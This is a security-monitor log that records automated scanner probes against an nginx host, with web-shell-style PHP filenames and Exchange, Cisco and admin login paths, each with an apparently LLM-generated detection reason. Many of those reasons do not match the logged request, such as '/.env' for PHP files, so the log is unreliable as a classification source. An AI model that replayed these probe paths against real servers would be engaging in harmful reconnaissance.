Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:44.460094555Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /grsiuk.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.529103 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:44.528842857Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /grsiuk.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.596538 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:44.596286838Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /wp-p2r3q9c8k4.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.664743 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:44.664392555Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /wp-p2r3q9c8k4.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.732019 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:44.731770255Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /wp-access.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.801942 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:44.801693404Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /wp-access.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.869575 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:44.869321446Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /inege.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:44.937875 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:44.937647847Z 20.220.232.240 - - [20/Mar/2026:09:11:44 +0000] "media.admin.kovicloud.com" "GET /inege.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.005912 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:45.005654576Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /bgymj.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.073794 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:45.073553894Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /bgymj.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.142004 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:45.141720597Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /6kDPjgFTmvS.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.210372 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:45.210095650Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /6kDPjgFTmvS.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.297349 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:45.297051366Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /tx78.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.367216 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:45.366944510Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /tx78.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.434832 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:45.434565015Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /init.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.502506 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:45.502264586Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /init.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.569796 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:45.569514553Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /ws49.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.638068 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 400 response to a GET on a PHP endpoint from an external IP and host header could indicate probing or malformed request patterns typical of automated scanners. Line=2026-03-20T09:11:45.637793275Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /ws49.php HTTP/1.1" 400 143 "-" "-" "-" Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.705259 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:45.704970030Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /56c53.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.773654 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:45.773422396Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /56c53.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.841119 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:45.840507455Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /public/file.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.909098 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:45.908772129Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /public/file.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:45.976896 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:45.976538232Z 20.220.232.240 - - [20/Mar/2026:09:11:45 +0000] "media.admin.kovicloud.com" "GET /144.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.045798 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:46.045526983Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /144.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.116436 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:46.116116549Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /clss.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.185004 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:46.184747777Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /clss.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.291356 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:46.291076832Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /motu.php HTTP/1.1" 302 138 "-" "-" "-" Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.359189 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:46.358923380Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /motu.php HTTP/1.1" 200 1309 "-" "-" "-" Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.470140 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. 
Line=2026-03-20T09:11:46.469879597Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /ajax.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.538132 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:46.537893214Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /ajax.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.605193 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:46.604906832Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /maul.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:46.673278 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:46.673028307Z 20.220.232.240 - - [20/Mar/2026:09:11:46 +0000] "media.admin.kovicloud.com" "GET /maul.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.019076 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:47.018826324Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /public/wp-blog.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.096377 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:47.096122901Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /public/wp-blog.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.163877 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:47.163607167Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /wp-content/radio.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.231614 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:47.231342798Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /wp-content/radio.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.520175 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:47.519914548Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /callback.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.588797 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:47.588317943Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /callback.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.655664 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe. Line=2026-03-20T09:11:47.655402686Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /166.php HTTP/1.1" 302 138 "-" "-" "-"
Mar 20 09:11:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:11:47.725546 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /.env may indicate probing for sensitive environment configuration. Line=2026-03-20T09:11:47.725259696Z 20.220.232.240 - - [20/Mar/2026:09:11:47 +0000] "media.admin.kovicloud.com" "GET /166.php HTTP/1.1" 200 1309 "-" "-" "-"
Mar 20 09:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:12:01.948771 [observer] Pipeline: processed=3716 pattern_hits=3645 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:12:01.955929 [observer] Patterns: hash=3645 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:12:31.935455 [observer] Pipeline: processed=3720 pattern_hits=3649 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:12:31.935485 [observer] Patterns: hash=3649 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:13:01.944109 [observer] Pipeline: processed=3723 pattern_hits=3652 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:13:01.944136 [observer] Patterns: hash=3652 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:13:31.935720 [observer] Pipeline: processed=3727 pattern_hits=3656 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:13:31.935746 [observer] Patterns: hash=3656 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:14:01.942737 [observer] Pipeline: processed=3729 pattern_hits=3658 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:14:01.942763 [observer] Patterns: hash=3658 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:14:31.951831 [observer] Pipeline: processed=3732 pattern_hits=3661 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:14:31.951858 [observer] Patterns: hash=3661 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:15:01.944380 [observer] Pipeline: processed=3737 pattern_hits=3666 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:15:01.944415 [observer] Patterns: hash=3666 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:15:31.934910 [observer] Pipeline: processed=3739 pattern_hits=3668 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:15:31.934941 [observer] Patterns: hash=3668 prefix=0 regex=0 contains=0 deny=13 alert=291 suppress=0 misses=71
Mar 20 09:15:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:15:47.743330 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T09:15:47.743019798Z 216.180.246.228 - - [20/Mar/2026:09:15:47 +0000] "_" "\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xED\xF4LC\xE2\x17Yt \xF0`U\xF9\xD83oU{\xCF\xC2Pgv^y\x03\xFC\xD14\xF3\x...
Mar 20 09:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:16:01.977940 [observer] Pipeline: processed=3744 pattern_hits=3673 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:16:01.977981 [observer] Patterns: hash=3673 prefix=0 regex=0 contains=0 deny=13 alert=292 suppress=0 misses=71
Mar 20 09:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:16:31.944879 [observer] Pipeline: processed=3746 pattern_hits=3675 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:16:31.944905 [observer] Patterns: hash=3675 prefix=0 regex=0 contains=0 deny=13 alert=292 suppress=0 misses=71
Mar 20 09:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:17:01.936301 [observer] Pipeline: processed=3752 pattern_hits=3681 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:17:01.936324 [observer] Patterns: hash=3681 prefix=0 regex=0 contains=0 deny=13 alert=292 suppress=0 misses=71
Mar 20 09:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:17:31.944037 [observer] Pipeline: processed=3754 pattern_hits=3683 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:17:31.944069 [observer] Patterns: hash=3683 prefix=0 regex=0 contains=0 deny=13 alert=292 suppress=0 misses=71
Mar 20 09:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:18:01.953909 [observer] Pipeline: processed=3756 pattern_hits=3685 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:18:01.954018 [observer] Patterns: hash=3685 prefix=0 regex=0 contains=0 deny=13 alert=292 suppress=0 misses=71
Mar 20 09:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:18:31.934258 [observer] Pipeline: processed=3760 pattern_hits=3689 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:18:31.934281 [observer] Patterns: hash=3689 prefix=0 regex=0 contains=0 deny=13 alert=292 suppress=0 misses=71
Mar 20 09:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:01.951183 [observer] Pipeline: processed=3762 pattern_hits=3691 llm_calls=71 llm_errors=0 learned=0
Mar 20 09:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:01.951573 [observer] Patterns: hash=3691 prefix=0 regex=0 contains=0 deny=13 alert=292 suppress=0 misses=71
Mar 20 09:19:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:15.722277 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 09:19:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:15.722314 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /manage/account/login resulted in a file not found error, which can indicate probing for admin/login paths or misconfigured routes. Line=2026-03-20T09:19:09.513202727Z 2026/03/20 09:19:09 [error] 422#422: *748025 open() "/usr/share/nginx/default/manage/account/login" failed (2: No such file or directory), client: 216.180.246.228, serve...
Mar 20 09:19:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:15.722417 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T09:19:09.513243381Z 216.180.246.228 - - [20/Mar/2026:09:19:09 +0000] "54.200.221.0" "GET /manage/account/login HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://...
Mar 20 09:19:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:21.038319 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 09:19:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:21.038371 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request targets admin/index.html and nginx cannot open the file; could indicate probing for admin assets or misconfiguration. Not definitive malicious but warrants monitoring. Line=2026-03-20T09:19:10.021210698Z 2026/03/20 09:19:10 [error] 422#422: *748025 open() "/usr/share/nginx/default/admin/index.html" failed (2: No such file or directory), client: 216.180.246.228, server: _...
Mar 20 09:19:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:21.038430 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T09:19:10.021265044Z 216.180.246.228 - - [20/Mar/2026:09:19:10 +0000] "54.200.221.0" "GET /admin/index.html HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www....
Mar 20 09:19:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:26.934608 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 09:19:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:26.934649 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to a path containing +CSCOE+ in an nginx error log is unusual and may indicate probing for vulnerable Cisco components or misconfigured paths. Line=2026-03-20T09:19:15.247605791Z 2026/03/20 09:19:15 [error] 422#422: *748025 open() "/usr/share/nginx/default/+CSCOE+/logon.html" failed (2: No such file or directory), client: 216.180.246.228, server:...
Mar 20 09:19:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 09:19:26.934702 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T09:19:15.247670092Z 216.180.246.228 - - [20/Mar/2026:09:19:15 +0000] "54.200.221.0" "GET /+CSCOE+/logon.html HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://ww...
